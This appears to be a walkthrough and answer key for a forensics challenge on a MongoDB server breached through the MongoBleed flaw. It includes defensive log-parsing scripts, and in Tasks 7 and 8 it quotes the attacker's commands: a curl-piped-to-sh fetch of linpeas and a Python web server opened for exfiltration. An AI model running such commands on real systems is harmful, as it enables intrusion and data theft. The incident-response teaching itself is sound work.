Overview
You were contacted early this morning to handle a high‑priority incident involving a suspected compromised server. The host, mongodbsync, is a secondary MongoDB server. According to the administrator, it’s maintained once a month, and they recently became aware of a vulnerability referred to as MongoBleed. As a precaution, the administrator has provided you with root-level access to facilitate your investigation.
You have already collected a triage acquisition from the server using UAC. Perform a rapid triage analysis of the collected artifacts to determine whether the system has been compromised, identify any attacker activity (initial access, persistence, privilege escalation, lateral movement, or data access/exfiltration), and summarize your findings with an initial incident assessment and recommended next steps.
About This Sherlock
This Sherlock provides hands-on experience involving forensics and incident response, including the MongoBleed Vulnerability.
MongoBleed Vulnerability
MongoBleed is a heap-memory disclosure vulnerability in the MongoDB Server. It arises in the server’s zlib compression handling logic, specifically in how it parses compressed network messages. By sending specially crafted messages with inconsistent length fields, an attacker can cause MongoDB to return uninitialized heap memory, potentially exposing sensitive in-memory data, without any authentication.
Key Characteristics:
- Type: Heap-memory disclosure vulnerability
- Component: zlib compression handling logic
- Attack Vector: Specially crafted compressed network messages with inconsistent length fields
- Impact: Exposure of uninitialized heap memory containing sensitive in-memory data
- Authentication Required: No authentication needed to exploit
Sherlock Statistics:
- Release Date: December 31, 2025
Investigation Environment
- Triage Package: MangoBleed.zip (31 MB)
- Target System: mongodbsync (secondary MongoDB server)
- Access Level: Root-level access provided by administrator
Task 1: CVE Identification
Question: What is the CVE ID designated to the MongoDB vulnerability explained in the scenario?
This one can be googled: “MongoBleed CVE#”
Answer: CVE-2025-14847
Task 2: MongoDB Version Identification
Question: What is the version of MongoDB installed on the server that the CVE exploited?
┌ 2813308004@Fred uac-mongodbsync-linux-triage
└ $ type '.\`[root`]\var\log\mongodb\mongod.log' | sls 'build'
{"t":{"$date":"2025-12-29T05:11:47.713+00:00"},"s":"I", "c":"CONTROL", "id":23403, "ctx":"initandlisten","msg":"Build Info","attr":{"buildInfo":{"version":"8.0.16"
Answer: 8.0.16
Task 3: Attacker IP Address
Question: Analyze the MongoDB logs to identify the attacker’s remote IP address used to exploit the CVE.
To identify the attacker’s remote IP address, we can review MongoDB events in the logs. The following event IDs are relevant for tracking connections:
| Event ID | Type | Description |
|---|---|---|
| 22943 | Connection Accepted | Logged when a client connects |
| 51800 | Client Metadata | Logged when a client sends driver/application info |
| 22944 | Connection Closed | Logged when a client disconnects |
The attacker’s IP address can be found in connection events. Example log entry showing the connection:
{"t":{"$date":"2025-12-29T05:27:07.006+00:00"},"s":"I", "c":"NETWORK", "id":22944, "ctx":"conn37515","msg":"Connection ended","attr":{"remote":"65.0.76.43:35952","isLoadBalanced":false,"uuid":{"uuid":{"$uuid":"8dc3110d-e9cb-4c78-bd4a-4cf9fbc703f6"}},"connectionId":37515,"connectionCount":0}}
Answer: 65.0.76.43
Task 4: Initial Exploitation Time
Question: Based on the MongoDB logs, determine the exact date and time the attacker’s exploitation activity began (the earliest confirmed malicious event).
We can search the logs using the attacker’s IP address to find the first instance of it being seen:
┌──(pretengineer㉿wick)-[~/Documents/sherlocks/mangobleed/uac-mongodbsync-linux-triage]
└─$ grep -n "65.0.76.43" \[root\]/var/log/mongodb/mongod.log | head -1
182:{"t":{"$date":"2025-12-29T05:25:52.743+00:00"},"s":"I", "c":"NETWORK", "id":22943, "ctx":"listener","msg":"Connection accepted","attr":{"remote":"65.0.76.43:35340","isLoadBalanced":false,"uuid":{"uuid":{"$uuid":"099e057e-11c1-46ed-b129-a158578d2014"}},"connectionId":1,"connectionCount":1}}
Answer: 2025-12-29 05:25:52
Task 5: Malicious Connection Count
Question: Using the MongoDB logs, calculate the total number of malicious connections initiated by the attacker.
We can count all log lines containing the attacker’s IP address:
┌──(pretengineer㉿wick)-[~/Documents/sherlocks/mangobleed/uac-mongodbsync-linux-triage]
└─$ cat '[root]/var/log/mongodb/mongod.log' | grep '65.0.76.43' | wc -l
75260
Answer: 75260
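The grep-based steps of Tasks 3 to 5 (find the remote IP, its first-seen time, and how many events it generated) can be done in one pass over the structured log, because mongod writes one JSON document per line. The script below is an added example, not part of the Sherlock or the write-up; it uses the event IDs from the table in Task 3, a constructed mongod.log sample (65.0.76.43 from the write-up plus a made-up legitimate client 10.0.0.5), and a heuristic of my own: accepted connections that never log client metadata (id 51800) are worth a closer look, since real drivers send it.

```python
import json

# Event ids from the Task 3 table: accepted / client metadata / ended.
CONN_EVENTS = {22943: "accepted", 51800: "metadata", 22944: "ended"}

# Constructed sample of mongod.log (one JSON document per line); 65.0.76.43 is the
# attacker IP from the write-up, 10.0.0.5 is a made-up legitimate driver client.
SAMPLE_LOG = r'''
{"t":{"$date":"2025-12-29T05:11:47.713+00:00"},"s":"I","c":"CONTROL","id":23403,"ctx":"initandlisten","msg":"Build Info","attr":{"buildInfo":{"version":"8.0.16"}}}
{"t":{"$date":"2025-12-29T05:20:01.000+00:00"},"s":"I","c":"NETWORK","id":22943,"ctx":"listener","msg":"Connection accepted","attr":{"remote":"10.0.0.5:50001","connectionId":1,"connectionCount":1}}
{"t":{"$date":"2025-12-29T05:20:01.050+00:00"},"s":"I","c":"NETWORK","id":51800,"ctx":"conn1","msg":"client metadata","attr":{"remote":"10.0.0.5:50001","client":{"driver":{"name":"mongo-go-driver"}}}}
{"t":{"$date":"2025-12-29T05:25:52.743+00:00"},"s":"I","c":"NETWORK","id":22943,"ctx":"listener","msg":"Connection accepted","attr":{"remote":"65.0.76.43:35340","connectionId":2,"connectionCount":2}}
{"t":{"$date":"2025-12-29T05:25:52.760+00:00"},"s":"I","c":"NETWORK","id":22944,"ctx":"conn2","msg":"Connection ended","attr":{"remote":"65.0.76.43:35340","connectionId":2,"connectionCount":1}}
{"t":{"$date":"2025-12-29T05:25:53.001+00:00"},"s":"I","c":"NETWORK","id":22943,"ctx":"listener","msg":"Connection accepted","attr":{"remote":"65.0.76.43:35341","connectionId":3,"connectionCount":2}}
{"t":{"$date":"2025-12-29T05:25:53.020+00:00"},"s":"I","c":"NETWORK","id":22944,"ctx":"conn3","msg":"Connection ended","attr":{"remote":"65.0.76.43:35341","connectionId":3,"connectionCount":1}}
'''

def summarize_connections(lines):
    """Per remote IP: counts of accepted/metadata/ended events plus first/last seen."""
    per_ip = {}
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            ev = json.loads(raw)
        except json.JSONDecodeError:
            continue  # truncated or non-JSON line: skip it rather than abort triage
        kind = CONN_EVENTS.get(ev.get("id"))
        remote = ev.get("attr", {}).get("remote")
        if kind is None or not remote:
            continue
        ip = remote.rsplit(":", 1)[0]  # drop the ephemeral source port
        ts = ev["t"]["$date"]          # fixed-format ISO-8601 in one zone: string order == time order
        s = per_ip.setdefault(ip, {"accepted": 0, "metadata": 0, "ended": 0,
                                   "first_seen": ts, "last_seen": ts})
        s[kind] += 1
        s["first_seen"] = min(s["first_seen"], ts)
        s["last_seen"] = max(s["last_seen"], ts)
    return per_ip

def flag_no_metadata_clients(per_ip, min_accepted=2):
    """Heuristic (my assumption, not a MongoDB rule): drivers log client metadata on each
    connection, so repeated accepts with none suggest a raw protocol tool, not an app."""
    return sorted(ip for ip, s in per_ip.items()
                  if s["accepted"] >= min_accepted and s["metadata"] == 0)

if __name__ == "__main__":
    stats = summarize_connections(SAMPLE_LOG.splitlines())
    print(stats, flag_no_metadata_clients(stats))
```

On the real acquisition, replace `SAMPLE_LOG.splitlines()` with the lines of `[root]/var/log/mongodb/mongod.log`; the first_seen value for the flagged IP is the Task 4 answer.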
Task 6: Successful Remote Access Time
Question: The attacker gained remote access after a series of brute‑force attempts. The attack likely exposed sensitive information, which enabled them to gain remote access. Based on the logs, when did the attacker successfully gain interactive hands-on remote access?
Looking at the auth.log, we can search for the attacker’s IP address to find where the brute force ends and a connection is accepted:
┌──(pretengineer㉿wick)-[~/Documents/sherlocks/mangobleed/uac-mongodbsync-linux-triage]
└─$ cat '[root]/var/log/auth.log' | grep '65.0.76.43'
The successful connection is logged here:
2025-12-29T05:40:03.475659+00:00 ip-172-31-38-170 sshd[39962]: Accepted keyboard-interactive/pam for mongoadmin from 65.0.76.43 port 46062 ssh2
Answer: 2025-12-29 05:40:03
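The "where does the brute force end and a login succeed" check from Task 6 is easy to automate across the whole auth.log. The following is an added example, not part of the write-up: it parses sshd Accepted/Failed lines, counts failures per source IP, and reports every successful login whose source had already failed several times. The sample log is constructed; only the final Accepted line is the real entry quoted above, the failed attempts and the publickey login from 172.31.40.12 are made up.

```python
import re
from collections import defaultdict

# Constructed sample auth.log excerpt in the sshd format shown in the write-up.
SAMPLE_AUTH = """\
2025-12-29T05:39:40.101000+00:00 ip-172-31-38-170 sshd[39940]: Failed keyboard-interactive/pam for mongoadmin from 65.0.76.43 port 46010 ssh2
2025-12-29T05:39:45.204000+00:00 ip-172-31-38-170 sshd[39944]: Failed keyboard-interactive/pam for mongoadmin from 65.0.76.43 port 46021 ssh2
2025-12-29T05:39:50.333000+00:00 ip-172-31-38-170 sshd[39951]: Failed keyboard-interactive/pam for mongoadmin from 65.0.76.43 port 46033 ssh2
2025-12-29T05:39:55.910000+00:00 ip-172-31-38-170 sshd[39955]: Failed keyboard-interactive/pam for mongoadmin from 65.0.76.43 port 46048 ssh2
2025-12-29T05:39:58.000000+00:00 ip-172-31-38-170 sshd[39958]: Accepted publickey for deploy from 172.31.40.12 port 51000 ssh2
2025-12-29T05:40:03.475659+00:00 ip-172-31-38-170 sshd[39962]: Accepted keyboard-interactive/pam for mongoadmin from 65.0.76.43 port 46062 ssh2
"""

# Matches sshd's "Accepted <method> for <user> from <ip> port <n> ssh2" and the
# "Failed ..." variant (including "invalid user" attempts) on ISO-timestamped lines.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\S+) "
    r"for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2")

def brute_force_logins(lines, min_failures=3):
    """Return (timestamp, user, ip, prior_failures) for every Accepted login whose
    source IP had at least min_failures Failed attempts earlier in the log."""
    failures = defaultdict(int)
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # session open/close, disconnect and PAM lines are not login results
        ip = m["ip"]
        if m["result"] == "Failed":
            failures[ip] += 1
        elif failures[ip] >= min_failures:
            hits.append((m["ts"], m["user"], ip, failures[ip]))
    return hits

if __name__ == "__main__":
    for ts, user, ip, n in brute_force_logins(SAMPLE_AUTH.splitlines()):
        print(f"{ts} {user}@{ip} accepted after {n} failures")
```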
Task 7: Privilege Escalation Command
Question: Identify the exact command line the attacker used to execute an in‑memory script as part of their privilege‑escalation attempt.
We can examine the attacker’s bash history to find the privilege escalation command:
┌──(pretengineer㉿wick)-[~/Documents/sherlocks/mangobleed/uac-mongodbsync-linux-triage]
└─$ cat \[root\]/home/mongoadmin/.bash_history
ls -la
whoami
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
cd /data
cd ~
ls -al
cd /
ls
cd /var/lib/mongodb/
ls -la
cd ../
which zip
apt install zip
zip
cd mongodb/
python3
python3 -m http.server 6969
exit
The attacker used curl to download linpeas.sh (Linux Privilege Escalation Awesome Scripts) and executed it directly in memory by piping to sh.
Answer: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Task 8: Exfiltration Target Directory
Question: The attacker was interested in a specific directory and also opened a Python web server, likely for exfiltration purposes. Which directory was the target?
Using the same bash history output from Task 7, we can see the attacker navigated to a specific directory and then started a Python HTTP server:
cd /var/lib/mongodb/
ls -la
cd ../
which zip
apt install zip
zip
cd mongodb/
python3
python3 -m http.server 6969
The attacker changed to /var/lib/mongodb/ and then started a Python HTTP server on port 6969, indicating this was the target directory for exfiltration.
Answer: /var/lib/mongodb